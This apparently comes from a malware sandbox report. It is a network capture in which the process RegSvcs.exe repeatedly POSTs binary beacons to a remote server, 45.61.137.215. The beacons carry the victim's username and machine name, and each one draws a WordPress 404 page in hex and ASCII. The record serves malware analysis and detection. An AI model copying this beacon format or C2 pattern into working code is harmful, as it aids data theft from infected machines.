href="https://gmpg.org/xfn/11"><title>Page not found – separated paper</title><meta name='robots' content='max-image-preview:large' /><link rel='dns-prefetch' href='//fonts.googleapis.com' /><link rel="alternate" type="application/rss+xml" title="separated paper » Feed" href="http://45.61.137.215/index.php/feed/" /><link rel="alternate" type="application/rss+xml" title="separated paper » Comments Feed" href="http://45.61.137.215/index.php/comments/feed/" /><script type="text/javascript">/* <![CDATA[ */window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/svg\/","svgExt":".svg","source":{"concate
May 29, 2024 15:44:52.933543921 CEST	1236	IN	Data Raw: 6d 6f 6a 69 22 3a 22 68 74 74 70 3a 5c 2f 5c 2f 34 35 2e 36 31 2e 31 33 37 2e 32 31 35 5c 2f 77 70 2d 69 6e 63 6c 75 64 65 73 5c 2f 6a 73 5c 2f 77 70 2d 65 6d 6f 6a 69 2d 72 65 6c 65 61 73 65 2e 6d 69 6e 2e 6a 73 3f 76 65 72 3d 36 2e 35 2e 33 22 Data Ascii: moji":"http:\/\/45.61.137.215\/wp-includes\/js\/wp-emoji-release.min.js?ver=6.5.3"}};/! This file is auto-generated /!function(i,n){var o,s,e;function c(e){try{var t={supportTests:e,timestamp:(new Date).valueOf()};sessionStorage.setItem(o,
May 29, 2024 15:44:52.933554888 CEST	1236	IN	Data Raw: 65 6e 43 61 6e 76 61 73 28 33 30 30 2c 31 35 30 29 3a 69 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 63 61 6e 76 61 73 22 29 2c 61 3d 72 2e 67 65 74 43 6f 6e 74 65 78 74 28 22 32 64 22 2c 7b 77 69 6c 6c 52 65 61 64 46 72 65 71 75 65 6e 74 6c Data Ascii: enCanvas(300,150):i.createElement("canvas"),a=r.getContext("2d",{willReadFrequently:!0}),o=(a.textBaseline="top",a.font="600 32px Arial",{});return e.forEach(function(e){o[e]=t(a,e,n)}),o}function t(e){var t=i.createElement("script");t.src=e,t
May 29, 2024 15:44:52.933563948 CEST	1236	IN	Data Raw: 75 70 70 6f 72 74 73 5b 74 5d 3d 65 5b 74 5d 2c 6e 2e 73 75 70 70 6f 72 74 73 2e 65 76 65 72 79 74 68 69 6e 67 3d 6e 2e 73 75 70 70 6f 72 74 73 2e 65 76 65 72 79 74 68 69 6e 67 26 26 6e 2e 73 75 70 70 6f 72 74 73 5b 74 5d 2c 22 66 6c 61 67 22 21 Data Ascii: upports[t]=e[t],n.supports.everything=n.supports.everything&&n.supports[t],"flag"!==t&&(n.supports.everythingExceptFlag=n.supports.everythingExceptFlag&&n.supports[t]);n.supports.everythingExceptFlag=n.supports.everythingExceptFlag&&!n.support
May 29, 2024 15:44:52.933574915 CEST	896	IN	Data Raw: 72 3a 23 33 32 33 37 33 63 3b 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 39 39 39 39 70 78 3b 62 6f 78 2d 73 68 61 64 6f 77 3a 6e 6f 6e 65 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 3a 63 61 6c 63 28 2e Data Ascii: r:#32373c;border-radius:9999px;box-shadow:none;text-decoration:none;padding:calc(.667em + 2px) calc(1.333em + 2px);font-size:1.125em}.wp-block-file__button{background:#32373c;color:#fff;text-decoration:none}</style><style id='global-styles-i
May 29, 2024 15:44:52.933583975 CEST	1236	IN	Data Raw: 2c 32 32 37 2c 31 29 20 30 25 2c 72 67 62 28 31 35 35 2c 38 31 2c 32 32 34 29 20 31 30 30 25 29 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 67 72 61 64 69 65 6e 74 2d 2d 6c 69 67 68 74 2d 67 72 65 65 6e 2d 63 79 61 6e 2d 74 6f 2d 76 69 76 69 64 Data Ascii: ,227,1) 0%,rgb(155,81,224) 100%);--wp--preset--gradient--light-green-cyan-to-vivid-green-cyan: linear-gradient(135deg,rgb(122,220,180) 0%,rgb(0,208,130) 100%);--wp--preset--gradient--luminous-vivid-amber-to-luminous-vivid-orange: linear-gradie
May 29, 2024 15:44:52.933593035 CEST	1236	IN	Data Raw: 64 69 65 6e 74 2d 2d 65 6c 65 63 74 72 69 63 2d 67 72 61 73 73 3a 20 6c 69 6e 65 61 72 2d 67 72 61 64 69 65 6e 74 28 31 33 35 64 65 67 2c 72 67 62 28 32 30 32 2c 32 34 38 2c 31 32 38 29 20 30 25 2c 72 67 62 28 31 31 33 2c 32 30 36 2c 31 32 36 29 Data Ascii: dient--electric-grass: linear-gradient(135deg,rgb(202,248,128) 0%,rgb(113,206,126) 100%);--wp--preset--gradient--midnight: linear-gradient(135deg,rgb(2,3,129) 0%,rgb(40,116,252) 100%);--wp--preset--font-size--small: 13px;--wp--preset--font-siz
May 29, 2024 15:44:52.933602095 CEST	448	IN	Data Raw: 20 32 65 6d 3b 7d 3a 77 68 65 72 65 28 2e 77 70 2d 62 6c 6f 63 6b 2d 63 6f 6c 75 6d 6e 73 2e 69 73 2d 6c 61 79 6f 75 74 2d 67 72 69 64 29 7b 67 61 70 3a 20 32 65 6d 3b 7d 3a 77 68 65 72 65 28 2e 77 70 2d 62 6c 6f 63 6b 2d 70 6f 73 74 2d 74 65 6d Data Ascii: 2em;}:where(.wp-block-columns.is-layout-grid){gap: 2em;}:where(.wp-block-post-template.is-layout-flex){gap: 1.25em;}:where(.wp-block-post-template.is-layout-grid){gap: 1.25em;}.has-black-color{color: var(--wp--preset--color--black) !important
May 29, 2024 15:44:52.933617115 CEST	1236	IN	Data Raw: 2d 63 6f 6c 6f 72 2d 2d 70 61 6c 65 2d 70 69 6e 6b 29 20 21 69 6d 70 6f 72 74 61 6e 74 3b 7d 2e 68 61 73 2d 76 69 76 69 64 2d 72 65 64 2d 63 6f 6c 6f 72 7b 63 6f 6c 6f 72 3a 20 76 61 72 28 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 Data Ascii: -color--pale-pink) !important;}.has-vivid-red-color{color: var(--wp--preset--color--vivid-red) !important;}.has-luminous-vivid-orange-color{color: var(--wp--preset--color--luminous-vivid-orange) !important;}.has-luminous-vivid-amber-color{colo
May 29, 2024 15:44:52.933626890 CEST	224	IN	Data Raw: 6d 69 6e 6f 75 73 2d 76 69 76 69 64 2d 6f 72 61 6e 67 65 2d 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 76 61 72 28 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 6c 75 Data Ascii: minous-vivid-orange-background-color{background-color: var(--wp--preset--color--luminous-vivid-orange) !important;}.has-luminous-vivid-amber-background-color{background-color: var(--wp--preset--color--luminous-vivid-amber) !

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
64	192.168.2.9	49779	45.61.137.215	80	7532	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp	Bytes transferred	Direction	Data
May 29, 2024 15:44:53.150602102 CEST	246	OUT	POST /index.php/3b1tenbkyj HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 45.61.137.215 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: DCC85916 Content-Length: 145 Connection: close
May 29, 2024 15:44:53.155736923 CEST	145	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 08 00 00 00 74 00 69 00 6e 00 61 00 01 00 0c 00 00 00 35 00 32 00 38 00 31 00 31 00 30 00 01 00 0e 00 00 00 54 00 49 00 4e 00 41 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 00 01 00 01 Data Ascii: (ckav.rutina528110TINA-PC0FDD42EE188E931437F4FBE2C
May 29, 2024 15:44:55.600224972 CEST	1236	IN	HTTP/1.0 404 Not Found Date: Wed, 29 May 2024 13:44:53 GMT Server: Apache/2.4.52 (Ubuntu) Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Link: <http://45.61.137.215/index.php/wp-json/>; rel="https://api.w.org/" Connection: close Content-Type: text/html; charset=UTF-8 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0d 0a 09 3c 68 65 61 64 3e 0d 0a 09 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0d 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 09 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 6f 66 69 6c 65 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 67 6d 70 67 2e 6f 72 67 2f 78 66 6e 2f 31 31 22 3e 0d 0a 09 09 0d 0a 09 09 3c 74 69 74 6c 65 3e 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 20 26 23 38 32 31 31 3b 20 73 65 70 61 72 61 74 65 64 20 70 61 70 65 72 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 64 6e 73 2d 70 72 65 66 65 74 [TRUNCATED] Data Ascii: <!DOCTYPE html><html lang="en-US"><head><meta charset="UTF-8"><meta name="viewport" content="width=device-width, initial-scale=1"><link rel="profile" href="https://gmpg.org/xfn/11"><title>Page not found – separated paper</title><meta name='robots' content='max-image-preview:large' /><link rel='dns-prefetch' href='//fonts.googleapis.com' /><link rel="alternate" type="application/rss+xml" title="separated paper » Feed" href="http://45.61.137.215/index.php/feed/" /><link rel="alternate" type="application/rss+xml" title="separated paper » Comments Feed" href="http://45.61.137.215/index.php/comments/feed/" /><script type="text/javascript">/* <![CDATA[ */window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/svg\/","svgExt":".svg","source":{"concate
May 29, 2024 15:44:55.600243092 CEST	224	IN	Data Raw: 6d 6f 6a 69 22 3a 22 68 74 74 70 3a 5c 2f 5c 2f 34 35 2e 36 31 2e 31 33 37 2e 32 31 35 5c 2f 77 70 2d 69 6e 63 6c 75 64 65 73 5c 2f 6a 73 5c 2f 77 70 2d 65 6d 6f 6a 69 2d 72 65 6c 65 61 73 65 2e 6d 69 6e 2e 6a 73 3f 76 65 72 3d 36 2e 35 2e 33 22 Data Ascii: moji":"http:\/\/45.61.137.215\/wp-includes\/js\/wp-emoji-release.min.js?ver=6.5.3"}};/! This file is auto-generated /!function(i,n){var o,s,e;function c(e){try{var t={supportTests:e,timestamp:(new Date).valueOf()};sessio
May 29, 2024 15:44:55.600260973 CEST	1236	IN	Data Raw: 6e 53 74 6f 72 61 67 65 2e 73 65 74 49 74 65 6d 28 6f 2c 4a 53 4f 4e 2e 73 74 72 69 6e 67 69 66 79 28 74 29 29 7d 63 61 74 63 68 28 65 29 7b 7d 7d 66 75 6e 63 74 69 6f 6e 20 70 28 65 2c 74 2c 6e 29 7b 65 2e 63 6c 65 61 72 52 65 63 74 28 30 2c 30 Data Ascii: nStorage.setItem(o,JSON.stringify(t))}catch(e){}}function p(e,t,n){e.clearRect(0,0,e.canvas.width,e.canvas.height),e.fillText(t,0,0);var t=new Uint32Array(e.getImageData(0,0,e.canvas.width,e.canvas.height).data),r=(e.clearRect(0,0,e.canvas.wid
May 29, 2024 15:44:55.600271940 CEST	224	IN	Data Raw: 22 73 63 72 69 70 74 22 29 3b 74 2e 73 72 63 3d 65 2c 74 2e 64 65 66 65 72 3d 21 30 2c 69 2e 68 65 61 64 2e 61 70 70 65 6e 64 43 68 69 6c 64 28 74 29 7d 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 50 72 6f 6d 69 73 65 26 26 28 6f Data Ascii: "script");t.src=e,t.defer=!0,i.head.appendChild(t)}"undefined"!=typeof Promise&&(o="wpEmojiSettingsSupports",s=["flag","emoji"],n.supports={everything:!0,everythingExceptFlag:!0},e=new Promise(function(e){i.addEventListener(
May 29, 2024 15:44:55.600281954 CEST	1236	IN	Data Raw: 22 44 4f 4d 43 6f 6e 74 65 6e 74 4c 6f 61 64 65 64 22 2c 65 2c 7b 6f 6e 63 65 3a 21 30 7d 29 7d 29 2c 6e 65 77 20 50 72 6f 6d 69 73 65 28 66 75 6e 63 74 69 6f 6e 28 74 29 7b 76 61 72 20 6e 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 74 72 79 7b 76 61 72 Data Ascii: "DOMContentLoaded",e,{once:!0})}),new Promise(function(t){var n=function(){try{var e=JSON.parse(sessionStorage.getItem(o));if("object"==typeof e&&"number"==typeof e.timestamp&&(new Date).valueOf()<e.timestamp+604800&&"object"==typeof e.support
May 29, 2024 15:44:55.600295067 CEST	1236	IN	Data Raw: 70 65 6d 6f 6a 69 26 26 65 2e 74 77 65 6d 6f 6a 69 26 26 28 74 28 65 2e 74 77 65 6d 6f 6a 69 29 2c 74 28 65 2e 77 70 65 6d 6f 6a 69 29 29 29 7d 29 29 7d 28 28 77 69 6e 64 6f 77 2c 64 6f 63 75 6d 65 6e 74 29 2c 77 69 6e 64 6f 77 2e 5f 77 70 65 6d Data Ascii: pemoji&&e.twemoji&&(t(e.twemoji),t(e.wpemoji)))}))}((window,document),window._wpemojiSettings);/* ... */</script><style id='wp-emoji-styles-inline-css' type='text/css'>img.wp-smiley, img.emoji {display: inline !important;border: no
May 29, 2024 15:44:55.600316048 CEST	448	IN	Data Raw: 2d 63 6f 6c 6f 72 2d 2d 76 69 76 69 64 2d 72 65 64 3a 20 23 63 66 32 65 32 65 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 6c 75 6d 69 6e 6f 75 73 2d 76 69 76 69 64 2d 6f 72 61 6e 67 65 3a 20 23 66 66 36 39 30 30 3b 2d 2d 77 Data Ascii: -color--vivid-red: #cf2e2e;--wp--preset--color--luminous-vivid-orange: #ff6900;--wp--preset--color--luminous-vivid-amber: #fcb900;--wp--preset--color--light-green-cyan: #7bdcb5;--wp--preset--color--vivid-green-cyan: #00d084;--wp--preset--color
May 29, 2024 15:44:55.600325108 CEST	1236	IN	Data Raw: 2c 32 32 37 2c 31 29 20 30 25 2c 72 67 62 28 31 35 35 2c 38 31 2c 32 32 34 29 20 31 30 30 25 29 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 67 72 61 64 69 65 6e 74 2d 2d 6c 69 67 68 74 2d 67 72 65 65 6e 2d 63 79 61 6e 2d 74 6f 2d 76 69 76 69 64 Data Ascii: ,227,1) 0%,rgb(155,81,224) 100%);--wp--preset--gradient--light-green-cyan-to-vivid-green-cyan: linear-gradient(135deg,rgb(122,220,180) 0%,rgb(0,208,130) 100%);--wp--preset--gradient--luminous-vivid-amber-to-luminous-vivid-orange: linear-gradie
May 29, 2024 15:44:55.600337982 CEST	1236	IN	Data Raw: 64 69 65 6e 74 2d 2d 65 6c 65 63 74 72 69 63 2d 67 72 61 73 73 3a 20 6c 69 6e 65 61 72 2d 67 72 61 64 69 65 6e 74 28 31 33 35 64 65 67 2c 72 67 62 28 32 30 32 2c 32 34 38 2c 31 32 38 29 20 30 25 2c 72 67 62 28 31 31 33 2c 32 30 36 2c 31 32 36 29 Data Ascii: dient--electric-grass: linear-gradient(135deg,rgb(202,248,128) 0%,rgb(113,206,126) 100%);--wp--preset--gradient--midnight: linear-gradient(135deg,rgb(2,3,129) 0%,rgb(40,116,252) 100%);--wp--preset--font-size--small: 13px;--wp--preset--font-siz
May 29, 2024 15:44:55.600348949 CEST	448	IN	Data Raw: 20 32 65 6d 3b 7d 3a 77 68 65 72 65 28 2e 77 70 2d 62 6c 6f 63 6b 2d 63 6f 6c 75 6d 6e 73 2e 69 73 2d 6c 61 79 6f 75 74 2d 67 72 69 64 29 7b 67 61 70 3a 20 32 65 6d 3b 7d 3a 77 68 65 72 65 28 2e 77 70 2d 62 6c 6f 63 6b 2d 70 6f 73 74 2d 74 65 6d Data Ascii: 2em;}:where(.wp-block-columns.is-layout-grid){gap: 2em;}:where(.wp-block-post-template.is-layout-flex){gap: 1.25em;}:where(.wp-block-post-template.is-layout-grid){gap: 1.25em;}.has-black-color{color: var(--wp--preset--color--black) !important

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
65	192.168.2.9	49780	45.61.137.215	80	7532	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp	Bytes transferred	Direction	Data
May 29, 2024 15:44:55.765644073 CEST	246	OUT	POST /index.php/3b1tenbkyj HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 45.61.137.215 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: DCC85916 Content-Length: 145 Connection: close
May 29, 2024 15:44:55.770611048 CEST	145	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 08 00 00 00 74 00 69 00 6e 00 61 00 01 00 0c 00 00 00 35 00 32 00 38 00 31 00 31 00 30 00 01 00 0e 00 00 00 54 00 49 00 4e 00 41 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 00 01 00 01 Data Ascii: (ckav.rutina528110TINA-PC0FDD42EE188E931437F4FBE2C
May 29, 2024 15:44:58.294079065 CEST	1236	IN	HTTP/1.0 404 Not Found Date: Wed, 29 May 2024 13:44:56 GMT Server: Apache/2.4.52 (Ubuntu) Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Link: <http://45.61.137.215/index.php/wp-json/>; rel="https://api.w.org/" Connection: close Content-Type: text/html; charset=UTF-8 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0d 0a 09 3c 68 65 61 64 3e 0d 0a 09 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0d 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 09 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 6f 66 69 6c 65 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 67 6d 70 67 2e 6f 72 67 2f 78 66 6e 2f 31 31 22 3e 0d 0a 09 09 0d 0a 09 09 3c 74 69 74 6c 65 3e 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 20 26 23 38 32 31 31 3b 20 73 65 70 61 72 61 74 65 64 20 70 61 70 65 72 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 64 6e 73 2d 70 72 65 66 65 74 [TRUNCATED] Data Ascii: <!DOCTYPE html><html lang="en-US"><head><meta charset="UTF-8"><meta name="viewport" content="width=device-width, initial-scale=1"><link rel="profile" href="https://gmpg.org/xfn/11"><title>Page not found – separated paper</title><meta name='robots' content='max-image-preview:large' /><link rel='dns-prefetch' href='//fonts.googleapis.com' /><link rel="alternate" type="application/rss+xml" title="separated paper » Feed" href="http://45.61.137.215/index.php/feed/" /><link rel="alternate" type="application/rss+xml" title="separated paper » Comments Feed" href="http://45.61.137.215/index.php/comments/feed/" /><script type="text/javascript">/* <![CDATA[ */window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/svg\/","svgExt":".svg","source":{"concate
May 29, 2024 15:44:58.294105053 CEST	1236	IN	Data Raw: 6d 6f 6a 69 22 3a 22 68 74 74 70 3a 5c 2f 5c 2f 34 35 2e 36 31 2e 31 33 37 2e 32 31 35 5c 2f 77 70 2d 69 6e 63 6c 75 64 65 73 5c 2f 6a 73 5c 2f 77 70 2d 65 6d 6f 6a 69 2d 72 65 6c 65 61 73 65 2e 6d 69 6e 2e 6a 73 3f 76 65 72 3d 36 2e 35 2e 33 22 Data Ascii: moji":"http:\/\/45.61.137.215\/wp-includes\/js\/wp-emoji-release.min.js?ver=6.5.3"}};/! This file is auto-generated /!function(i,n){var o,s,e;function c(e){try{var t={supportTests:e,timestamp:(new Date).valueOf()};sessionStorage.setItem(o,
May 29, 2024 15:44:58.294116974 CEST	448	IN	Data Raw: 65 6e 43 61 6e 76 61 73 28 33 30 30 2c 31 35 30 29 3a 69 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 63 61 6e 76 61 73 22 29 2c 61 3d 72 2e 67 65 74 43 6f 6e 74 65 78 74 28 22 32 64 22 2c 7b 77 69 6c 6c 52 65 61 64 46 72 65 71 75 65 6e 74 6c Data Ascii: enCanvas(300,150):i.createElement("canvas"),a=r.getContext("2d",{willReadFrequently:!0}),o=(a.textBaseline="top",a.font="600 32px Arial",{});return e.forEach(function(e){o[e]=t(a,e,n)}),o}function t(e){var t=i.createElement("script");t.src=e,t
May 29, 2024 15:44:58.294126987 CEST	1236	IN	Data Raw: 22 44 4f 4d 43 6f 6e 74 65 6e 74 4c 6f 61 64 65 64 22 2c 65 2c 7b 6f 6e 63 65 3a 21 30 7d 29 7d 29 2c 6e 65 77 20 50 72 6f 6d 69 73 65 28 66 75 6e 63 74 69 6f 6e 28 74 29 7b 76 61 72 20 6e 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 74 72 79 7b 76 61 72 Data Ascii: "DOMContentLoaded",e,{once:!0})}),new Promise(function(t){var n=function(){try{var e=JSON.parse(sessionStorage.getItem(o));if("object"==typeof e&&"number"==typeof e.timestamp&&(new Date).valueOf()<e.timestamp+604800&&"object"==typeof e.support
May 29, 2024 15:44:58.294138908 CEST	1236	IN	Data Raw: 70 65 6d 6f 6a 69 26 26 65 2e 74 77 65 6d 6f 6a 69 26 26 28 74 28 65 2e 74 77 65 6d 6f 6a 69 29 2c 74 28 65 2e 77 70 65 6d 6f 6a 69 29 29 29 7d 29 29 7d 28 28 77 69 6e 64 6f 77 2c 64 6f 63 75 6d 65 6e 74 29 2c 77 69 6e 64 6f 77 2e 5f 77 70 65 6d Data Ascii: pemoji&&e.twemoji&&(t(e.twemoji),t(e.wpemoji)))}))}((window,document),window._wpemojiSettings);/* ... */</script><style id='wp-emoji-styles-inline-css' type='text/css'>img.wp-smiley, img.emoji {display: inline !important;border: no
May 29, 2024 15:44:58.294152021 CEST	448	IN	Data Raw: 2d 63 6f 6c 6f 72 2d 2d 76 69 76 69 64 2d 72 65 64 3a 20 23 63 66 32 65 32 65 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 6c 75 6d 69 6e 6f 75 73 2d 76 69 76 69 64 2d 6f 72 61 6e 67 65 3a 20 23 66 66 36 39 30 30 3b 2d 2d 77 Data Ascii: -color--vivid-red: #cf2e2e;--wp--preset--color--luminous-vivid-orange: #ff6900;--wp--preset--color--luminous-vivid-amber: #fcb900;--wp--preset--color--light-green-cyan: #7bdcb5;--wp--preset--color--vivid-green-cyan: #00d084;--wp--preset--color
May 29, 2024 15:44:58.294564009 CEST	1236	IN	Data Raw: 2c 32 32 37 2c 31 29 20 30 25 2c 72 67 62 28 31 35 35 2c 38 31 2c 32 32 34 29 20 31 30 30 25 29 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 67 72 61 64 69 65 6e 74 2d 2d 6c 69 67 68 74 2d 67 72 65 65 6e 2d 63 79 61 6e 2d 74 6f 2d 76 69 76 69 64 Data Ascii: ,227,1) 0%,rgb(155,81,224) 100%);--wp--preset--gradient--light-green-cyan-to-vivid-green-cyan: linear-gradient(135deg,rgb(122,220,180) 0%,rgb(0,208,130) 100%);--wp--preset--gradient--luminous-vivid-amber-to-luminous-vivid-orange: linear-gradie
May 29, 2024 15:44:58.294608116 CEST	1236	IN	Data Raw: 64 69 65 6e 74 2d 2d 65 6c 65 63 74 72 69 63 2d 67 72 61 73 73 3a 20 6c 69 6e 65 61 72 2d 67 72 61 64 69 65 6e 74 28 31 33 35 64 65 67 2c 72 67 62 28 32 30 32 2c 32 34 38 2c 31 32 38 29 20 30 25 2c 72 67 62 28 31 31 33 2c 32 30 36 2c 31 32 36 29 Data Ascii: dient--electric-grass: linear-gradient(135deg,rgb(202,248,128) 0%,rgb(113,206,126) 100%);--wp--preset--gradient--midnight: linear-gradient(135deg,rgb(2,3,129) 0%,rgb(40,116,252) 100%);--wp--preset--font-size--small: 13px;--wp--preset--font-siz
May 29, 2024 15:44:58.294621944 CEST	448	IN	Data Raw: 20 32 65 6d 3b 7d 3a 77 68 65 72 65 28 2e 77 70 2d 62 6c 6f 63 6b 2d 63 6f 6c 75 6d 6e 73 2e 69 73 2d 6c 61 79 6f 75 74 2d 67 72 69 64 29 7b 67 61 70 3a 20 32 65 6d 3b 7d 3a 77 68 65 72 65 28 2e 77 70 2d 62 6c 6f 63 6b 2d 70 6f 73 74 2d 74 65 6d Data Ascii: 2em;}:where(.wp-block-columns.is-layout-grid){gap: 2em;}:where(.wp-block-post-template.is-layout-flex){gap: 1.25em;}:where(.wp-block-post-template.is-layout-grid){gap: 1.25em;}.has-black-color{color: var(--wp--preset--color--black) !important
May 29, 2024 15:44:58.294876099 CEST	1236	IN	Data Raw: 2d 63 6f 6c 6f 72 2d 2d 70 61 6c 65 2d 70 69 6e 6b 29 20 21 69 6d 70 6f 72 74 61 6e 74 3b 7d 2e 68 61 73 2d 76 69 76 69 64 2d 72 65 64 2d 63 6f 6c 6f 72 7b 63 6f 6c 6f 72 3a 20 76 61 72 28 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 Data Ascii: -color--pale-pink) !important;}.has-vivid-red-color{color: var(--wp--preset--color--vivid-red) !important;}.has-luminous-vivid-orange-color{color: var(--wp--preset--color--luminous-vivid-orange) !important;}.has-luminous-vivid-amber-color{colo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
66	192.168.2.9	49781	45.61.137.215	80	7532	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp	Bytes transferred	Direction	Data
May 29, 2024 15:44:58.470592976 CEST	246	OUT	POST /index.php/3b1tenbkyj HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 45.61.137.215 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: DCC85916 Content-Length: 145 Connection: close
May 29, 2024 15:44:58.475689888 CEST	145	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 08 00 00 00 74 00 69 00 6e 00 61 00 01 00 0c 00 00 00 35 00 32 00 38 00 31 00 31 00 30 00 01 00 0e 00 00 00 54 00 49 00 4e 00 41 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 00 01 00 01 Data Ascii: (ckav.rutina528110TINA-PC0FDD42EE188E931437F4FBE2C
May 29, 2024 15:45:01.002490997 CEST	1236	IN	HTTP/1.0 404 Not Found Date: Wed, 29 May 2024 13:44:59 GMT Server: Apache/2.4.52 (Ubuntu) Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Link: <http://45.61.137.215/index.php/wp-json/>; rel="https://api.w.org/" Connection: close Content-Type: text/html; charset=UTF-8 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0d 0a 09 3c 68 65 61 64 3e 0d 0a 09 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0d 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 09 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 6f 66 69 6c 65 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 67 6d 70 67 2e 6f 72 67 2f 78 66 6e 2f 31 31 22 3e 0d 0a 09 09 0d 0a 09 09 3c 74 69 74 6c 65 3e 50 61 67 65 20 6e 